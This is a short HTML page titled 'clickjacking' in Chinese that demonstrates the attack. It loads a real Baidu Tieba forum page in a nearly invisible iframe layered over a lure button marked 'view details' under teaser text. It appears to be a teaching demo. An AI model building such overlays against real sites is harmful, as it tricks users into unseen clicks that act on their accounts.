<!DOCTYPE HTML>
<html>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<head>
    <title>点击劫持</title>
    <style>
        html,body,iframe{
            display: block;
            height: 100%;
            width: 100%;
            margin: 0;
            padding: 0;
            border:none;
        }
        iframe{
            opacity:0.3;
            filter:alpha(opacity=0);
            position:absolute;
            z-index:2;
        }
        button{
            position:absolute;
            top: 350px;
            left: 550px;
            z-index: 1;
            width: 72px;
            height: 26px;
        }
    </style>
</head>
<body>
那些不能说的秘密
<button id="1234">查看详情</button>
<iframe src="http://tieba.baidu.com/f?kw=%C3%C0%C5%AE"></iframe>
</body>
</html>